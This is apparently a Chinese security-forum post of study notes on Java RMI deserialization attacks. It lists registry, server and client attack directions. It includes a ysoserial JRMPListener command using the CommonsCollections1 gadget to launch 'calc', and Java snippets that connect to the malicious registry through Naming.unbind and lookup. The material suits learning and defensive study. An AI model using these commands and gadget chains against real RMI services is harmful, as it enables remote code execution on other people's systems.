安全矩阵

 找回密码
 立即注册
搜索
查看: 2124|回复: 0

java安全-02RMI

[复制链接]

249

主题

299

帖子

1391

积分

金牌会员

Rank: 6Rank: 6

积分
1391
发表于 2022-3-25 17:09:30 | 显示全部楼层 |阅读模式
原文链接:java安全-02RMI

基础知识
动态代理
反射
攻击方式
注册端攻击服务端
java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"
    public static void main(String[] args) throws RemoteException, MalformedURLException, NotBoundException, RemoteException {
        //开启一个恶意的reg,然后server去过去链接注册,则会中招
        String url = "rmi://127.0.0.1:1099/setUser";
        Naming.unbind(url);
    }
注册端攻击客户端
    public static void main(String[] args) {
        //PS F:\tools\EXP> java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"
        try{
            String url = "rmi://127.0.0.1:1099/exp";
            User user = (User) Naming.lookup(url);
        }catch(Exception e){
            e.printStackTrace();
        }
    }
服务端攻击注册端
    注册端开启
    Server端利用CC1进行攻击
服务端攻击客户端
    服务端将恶意类注册
    客户端加载执行


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-24 14:01 , Processed in 0.014257 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表